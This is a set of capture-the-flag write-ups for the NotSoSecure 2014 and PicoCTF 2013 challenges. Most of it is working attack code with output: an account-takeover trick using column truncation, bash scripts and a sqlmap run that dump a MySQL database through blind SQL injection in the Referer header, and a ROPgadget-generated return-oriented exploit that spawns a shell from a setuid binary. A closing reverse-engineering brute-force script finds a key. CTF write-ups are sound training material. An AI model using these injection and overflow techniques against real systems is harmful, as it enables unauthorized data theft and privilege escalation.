# NotSoSecure CTF April 2k14


Flag 1 - Column truncation

# cat get_register_page
#!/bin/bash

url='http://ctf.notsosecure.com/9128938921839838/'

comment=`curl --silent --location --request GET $url | grep -e '<!--' | tail -n 1 | awk -F '-' '{print $3}' | tr -d ' '`
echo $comment
echo $comment | base64 -d | gunzip ; echo

# ./get_register_page 
H4sIAAAAAAAAAAsyTs80LTEu0ssoyc0BACMzGYUNAAAA
R3gi5t3r.html

# cat get_flag_1
#!/bin/bash

regname="`echo -n \"$1\" | sed 's/ /%20/g'`"
regemail="$2"
regpass="$3"
url='http://ctf.notsosecure.com/9128938921839838'
register_url="$url/register.php?regname=$regname&regemail=$regemail&regpass1=$regpass&regpass2=$regpass"
cookie="nss"

curl --silent --request GET $register_url | grep -e 'successfully' -e 'Already'

checklogin_url="$url/checklogin.php"                                             
curl --silent --location --request POST --cookie-jar $cookie --cookie $cookie --data "myusername=admin&mypassword=$regpass" $checklogin_url | grep -e 'Flag' -e 'feedback'

# ./get_flag_1 'admin               nss' 'fake@mail.com' 's3cur3'
              <h3 style="text-align: center;font-size: 30px;">You have registered successfully</h3>
       <h4 style="text-align: center;">Well done, 1st Flag is 67326289</h4>
      <center><a href="f33db4ck_flag/index.php" class="btn">feedback</a></center>

Flag 2 - Blind SQLi in HTTP Referer

# cat get_flag_2
#!/bin/bash

./feedback_base

echo "=== Dump tables ==="
./dump_tables

echo "=== Dump columns from flag table ==="
./dump_columns flag

echo "=== Dump flags from flag column ==="
./dump_flags flag flag

# cat feedback_base
#!/bin/bash

ofile="normal"
name="name"
email="email"
message="message"
url='ctf.notsosecure.com/9128938921839838'
feedback_url="$url/f33db4ck_flag/submit.php"

curl --silent --request POST --data "name=$name&email=$email&message=$message&submit=Submit" $feedback_url > $ofile

# cat dump_tables
#!/bin/bash

t=0
while true; do
    error=`./feedback "(select count(distinct table_name) from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql')=$t" | grep Error`
    if [ "$error" != "" ]; then
        t=$[$t+1]
    else
        break
    fi
done

echo "#tables = $t"

for i in `seq 0 $[$t-1]`; do
    echo -n "table[$i] = "
    j=1
    while true; do
        error=`./feedback "(select length(table_name) from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit $i,1)=$j" | grep Error`
        if [ "$error" != "" ]; then
            j=$[$j+1]
        else
            break
        fi
    done
    for k in `seq 1 $j`; do
        for l in `echo {a..z} {0..9}`; do
            error=`./feedback "(select substring(table_name,$k,1) from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit $i,1)='$l'" | grep Error`
            if [ "$error" == "" ]; then
                echo -n $l
                break
            fi
        done
    done
    echo
done

# cat dump_columns 
#!/bin/bash

table="$1"
c=0
while true; do
    error=`./feedback "(select count(distinct column_name) from information_schema.columns where table_name='$table')=$c" | grep Error`
    if [ "$error" != "" ]; then
        c=$[$c+1]
    else
        break
    fi
done

echo "table = $table"
echo "#columns = $c"

for i in `seq 0 $[$c-1]`; do
    echo -n "column[$i] = "
    j=1
    while true; do
        error=`./feedback "(select length(column_name) from information_schema.columns where table_name='$table' limit $i,1)=$j" | grep Error`
        if [ "$error" != "" ]; then
            j=$[$j+1]
        else
            break
        fi
    done
    for k in `seq 1 $j`; do
        for l in `echo {a..z} {0..9}`; do
            error=`./feedback "(select substring(column_name,$k,1) from information_schema.columns where table_name='$table' limit $i,1)='$l'" | grep Error`
            if [ "$error" == "" ]; then
                echo -n $l
                break
            fi
        done
    done
    echo
done

# cat dump_flags 
#!/bin/bash

table="$1"
column="$2"
f=0
while true; do
    error=`./feedback "(select count(distinct $column) from $table)=$f" | grep Error`
    if [ "$error" != "" ]; then
        f=$[$f+1]
    else
        break
    fi
done

echo "table = $table"
echo "column = $table"
echo "#flags = $f"

for i in `seq 0 $[$f-1]`; do
    echo -n "flag[$i] = "
    j=1
    while true; do
        error=`./feedback "(select length($column) from $table limit $i,1)=$j" | grep Error`
        if [ "$error" != "" ]; then
            j=$[$j+1]
        else
            break
        fi
    done
    for k in `seq 1 $j`; do
        for l in `echo {a..z} {0..9}`; do
            error=`./feedback "(select substring($column,$k,1) from $table limit $i,1)='$l'" | grep Error`
            if [ "$error" == "" ]; then
                echo -n $l
                break
            fi
        done
    done
    echo
done

# ./cat feedback
#!/bin/bash

function compare {
    grep Thanks $ofile
    diff normal $ofile
    rm $ofile
}

function encode {
    echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
}

ofile="$RANDOM"
name="name"
email="email"
message="message"
condition="$1"
injection="'+(select if($condition,'1',(select table_name from information_schema.columns limit 1,2)))+'"
referer="`encode "$injection"`"
url='ctf.notsosecure.com/9128938921839838'
feedback_url="$url/f33db4ck_flag/submit.php"

#--proxy 127.0.0.1:8080
curl --silent --referer "$referer" --request POST --data "name=$name&email=$email&message=$message&submit=Submit" $feedback_url > $ofile
compare

# ./get_flag_2
=== Dump tables ===
#tables = 2
table[0] = flag
table[1] = temp
=== Dump columns from flag table ===
table = flag
#columns = 1
column[0] = flag
=== Dump flags from flag column ===
table = flag
column = flag
#flags = 1
flag[0] = 1362390

Flag 2 - Blind SQLi in HTTP Referer (sqlmap)

# cat do_sqlmap 
#!/bin/bash

function sqlm {
    args="$1"
    echo "$args"
    url='http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'
    referer='%27||(select(1)regexp(IF(1=1*,1,%27%27)))||%27'
    string='Thanks!, we will be in touch...'
    sqlmap \
        --url="$url" \
        --referer="$referer" \
        --string="$string" \
        --technique=B \
        --threads=4 \
        --answers='it?=Y,any)?=y' \
        $args
}

echo "=== Fingerprint ==="
sqlm
echo "=== Enumerate DBMS databases ==="
sqlm "--dbms=MySQL --dbs"
echo "=== Enumerate DBMS database tables ==="
sqlm "--dbms=MySQL -D seven --tables"
echo "=== Enumerate DBMS database table columns ==="
sqlm "--dbms=MySQL -D seven -T flag --columns"
echo "=== Dump DBMS database table entries ==="
sqlm "--dbms=MySQL -D seven -T flag -C flag --dump"

# ./do_sqlmap
=== Fingerprint ===

sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Referer #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: '||(select(1)regexp(IF(1=1 AND 4549=4549,1,'')))||'
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0

=== Enumerate DBMS databases ===
--dbms=MySQL --dbs

available databases [2]:
[*] information_schema
[*] seven

=== Enumerate DBMS database tables ===
--dbms=MySQL -D seven --tables

Database: seven
[2 tables]
+------+
| flag |
| temp |
+------+

=== Enumerate DBMS database table columns ===
--dbms=MySQL -D seven -T flag --columns

Database: seven
Table: flag
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag   | varchar(20) |
+--------+-------------+

=== Dump DBMS database table entries ===
--dbms=MySQL -D seven -T flag -C flag --dump

Database: seven
Table: flag
[1 entry]
+---------+
| flag    |
+---------+
| 1362390 |
+---------+

# PicoCTF 2k13 - Overflow 5


$ gdb buffer_overflow_shellcode_hard
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483c0 <+0>: push   ebp
   0x080483c1 <+1>: mov    ebp,esp
   0x080483c3 <+3>: and    esp,0xfffffff0
   0x080483c6 <+6>: sub    esp,0x10
   0x080483c9 <+9>: cmp    DWORD PTR [ebp+0x8],0x2
   0x080483cd <+13>: je     0x80483e2 <main+34>
   0x080483cf <+15>: mov    DWORD PTR [esp],0x80485c0
   0x080483d6 <+22>: call   0x8048390 <puts@plt>
   0x080483db <+27>: mov    eax,0x1
   0x080483e0 <+32>: leave  
   0x080483e1 <+33>: ret    
   0x080483e2 <+34>: call   0x8048370 <geteuid@plt>
   0x080483e7 <+39>: mov    DWORD PTR [esp+0x8],eax
   0x080483eb <+43>: mov    DWORD PTR [esp+0x4],eax
   0x080483ef <+47>: mov    DWORD PTR [esp],eax
   0x080483f2 <+50>: call   0x8048360 <setresuid@plt>
   0x080483f7 <+55>: mov    eax,DWORD PTR [ebp+0xc]
   0x080483fa <+58>: mov    eax,DWORD PTR [eax+0x4]
   0x080483fd <+61>: mov    DWORD PTR [esp],eax
   0x08048400 <+64>: call   0x80484c0 <vuln>
   0x08048405 <+69>: xor    eax,eax
   0x08048407 <+71>: leave  
   0x08048408 <+72>: ret    
End of assembler dump.
(gdb) disassemble vuln
Dump of assembler code for function vuln:
   0x080484c0 <+0>: sub    esp,0x41c
   0x080484c6 <+6>: mov    eax,DWORD PTR [esp+0x420]
   0x080484cd <+13>: mov    DWORD PTR [esp+0x4],eax
   0x080484d1 <+17>: lea    eax,[esp+0x10]
   0x080484d5 <+21>: mov    DWORD PTR [esp],eax
   0x080484d8 <+24>: call   0x8048380 <strcpy@plt>
   0x080484dd <+29>: add    esp,0x41c
   0x080484e3 <+35>: ret    
End of assembler dump.
(gdb) break main
(gdb) run
(gdb) info proc mappings 
process 21137
Mapped address spaces:

 Start Addr   End Addr       Size     Offset objfile
  0x8048000  0x8049000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x8049000  0x804a000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x804a000  0x804b000     0x1000     0x1000 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
 0xf7e28000 0xf7e29000     0x1000        0x0 
 0xf7e29000 0xf7fca000   0x1a1000        0x0 /lib32/libc-2.15.so
 0xf7fca000 0xf7fcc000     0x2000   0x1a1000 /lib32/libc-2.15.so
 0xf7fcc000 0xf7fcd000     0x1000   0x1a3000 /lib32/libc-2.15.so
 0xf7fcd000 0xf7fd1000     0x4000        0x0 
 0xf7fda000 0xf7fdb000     0x1000        0x0 
 0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
 0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib32/ld-2.15.so
 0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib32/ld-2.15.so
 0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib32/ld-2.15.so
 0xfffdd000 0xffffe000    0x21000        0x0 [stack]
$ ./ROPgadget /lib32/libc-2.15.so /bin/dash 2>&1 | grep -A 1000 python | sed -e "s/p = ''/p = '\\\x90'*1036/" -e 's/off = 0x0/off = 0xf7e29000/' > ~/rop.py
# cat ~/rop.py 
#!/usr/bin/python
# execve generated by Ropgadget v4.0.4
from struct import pack

p = '\x90'*1036
# Padding goes here

# This ROP Exploit has been generated for a shared object.
# The addresses of the gadgets will need to be adjusted.
# Set this variable to the offset of the shared library
off = 0xf7e29000

p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee0) # @ .data
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "/bin" # /bin
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee4) # @ .data + 4
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "/das" # /das
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee8) # @ .data + 8
p += "AAAA" # padding
p += pack("<I", off + 0x00023f78) # pop eax ; ret
p += "hAAA" # hAAA
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += "AAAA" # padding
p += pack("<I", off + 0x00032e30) # xor eax,eax ; ret
p += pack("<I", off + 0x0007416a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", off + 0x000192ee) # pop ebx ; ret
p += pack("<I", off + 0x001a3ee0) # @ .data
p += pack("<I", off + 0x000f35df) # pop edx ; pop ecx ; pop eax ; ret
p += "AAAA" # padding
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += "AAAA" # padding
p += pack("<I", off + 0x00001a9e) # pop edx ; ret
p += pack("<I", off + 0x001a3ee9) # @ .data + 9
p += pack("<I", off + 0x00032e30) # xor eax,eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x000082ac) # inc eax ; ret
p += pack("<I", off + 0x0002e2f5) # int 0x80
print p
$ ./buffer_overflow_shellcode_hard `python ~/rop.py`
$ cat key
most_impressive_young_padawan

# PicoCTF 2k13 - Mildly Evil


$ objdump -M intel -d mildly_evil 

mildly_evil:     file format elf32-i386

Disassembly of section .text:

080480b8 <_start>:
 80480b8: bd 2c 91 04 08        mov    ebp,0x804912c
 80480bd: 89 ec                 mov    esp,ebp
 80480bf: eb 00                 jmp    80480c1 <go>

080480c1 <go>:
 80480c1: 39 e5                 cmp    ebp,esp
 80480c3: 7f 59                 jg     804811e <exit>
 80480c5: 58                    pop    eax
 80480c6: 5b                    pop    ebx
 80480c7: 59                    pop    ecx
 80480c8: 85 c0                 test   eax,eax
 80480ca: 7c 2f                 jl     80480fb <gc>
 80480cc: 85 db                 test   ebx,ebx
 80480ce: 7c 14                 jl     80480e4 <pc>
 80480d0: 8d 44 85 00           lea    eax,[ebp+eax*4+0x0]
 80480d4: 8b 00                 mov    eax,DWORD PTR [eax]
 80480d6: 8d 5c 9d 00           lea    ebx,[ebp+ebx*4+0x0]
 80480da: 29 03                 sub    DWORD PTR [ebx],eax
 80480dc: 7f e3                 jg     80480c1 <go>
 80480de: 8d 64 8d 00           lea    esp,[ebp+ecx*4+0x0]
 80480e2: eb dd                 jmp    80480c1 <go>

080480e4 <pc>:
 80480e4: 8d 4c 85 00           lea    ecx,[ebp+eax*4+0x0]
 80480e8: ba 01 00 00 00        mov    edx,0x1
 80480ed: bb 01 00 00 00        mov    ebx,0x1
 80480f2: b8 04 00 00 00        mov    eax,0x4
 80480f7: cd 80                 int    0x80
 80480f9: eb c6                 jmp    80480c1 <go>

080480fb <gc>:
 80480fb: 8d 74 9d 00           lea    esi,[ebp+ebx*4+0x0]
 80480ff: b9 28 91 04 08        mov    ecx,0x8049128
 8048104: ba 01 00 00 00        mov    edx,0x1
 8048109: 31 db                 xor    ebx,ebx
 804810b: b8 03 00 00 00        mov    eax,0x3
 8048110: cd 80                 int    0x80
 8048112: b8 28 91 04 08        mov    eax,0x8049128
 8048117: 0f b6 00              movzx  eax,BYTE PTR [eax]
 804811a: 01 06                 add    DWORD PTR [esi],eax
 804811c: eb a3                 jmp    80480c1 <go>

0804811e <exit>:
 804811e: b8 01 00 00 00        mov    eax,0x1
 8048123: 31 db                 xor    ebx,ebx
 8048125: cd 80                 int    0x80

$ cat bruteforce.sh 
#!/bin/bash

alphabet=`echo - {0..9} {A..Z} _ {a..z}`
key=''

cat > gdb.script << eof
break go
ignore 1 999999
run < key
info breakpoints
quit
eof

while [ true ]; do
    min_hits=999999
    f=0
    for i in $alphabet; do
        echo -n $i
        echo $key$i > key
        output=`gdb -q ./mildly_evil < gdb.script 2>&1`
        wrong=`echo "$output" | grep 'Wrong'`
        hits=`echo "$output" | grep 'already hit' | awk '{print $4}'`
        if [ "$wrong" != "" ]; then
            if [ $hits -lt $min_hits ]; then
                min_hits=$hits
                if [ $f -eq 1 ]; then 
                    key=$key$i
                    break
                fi
                f=1
            fi
        else
            echo 
            rm -f gdb.script key
            exit
        fi
        echo -ne '\b'
    done
done
$ ./bruteforce.sh
1337RE_m4ster
$ cat bruteforce.py 
import re
import gdb
import sys

def ge(command):
    return gdb.execute(command, False, True)

alphabet = []
alphabet.append(chr(45))
for i in xrange(48,58):
    alphabet.append(chr(i))
for i in xrange(65,91):
    alphabet.append(chr(i))
alphabet.append(chr(95))
for i in xrange(97,123):
    alphabet.append(chr(i))
key = ''
ofile = 'result.txt'

ge("set pagination off")
ge("set confirm off")
ge("file mildly_evil")
ge("break go")

while True:
    min_hits = 999999
    m = 0
    for i in alphabet:
        sys.stdout.write(i)
        sys.stdout.flush()
        ge("ignore 1 999999")
        gdb.execute("run <<< '" + key + i + "' > " + ofile, False, True)
        f = open(ofile, 'r')
        wrong = re.findall("Wrong", f.read())
        f.close()
        output = ge("info breakpoints")
        hits  = int(re.findall("hit ([0-9]+) times", output)[0])
        if wrong:
            if hits < min_hits:
                min_hits = hits
                if m == 1:
                    key += i
                    break
                m = 1
        else:
            print
            sys.exit()
        sys.stdout.write('\b')
ge("quit")
$ gdb -q -n -x bruteforce.py
1337RE_m4ster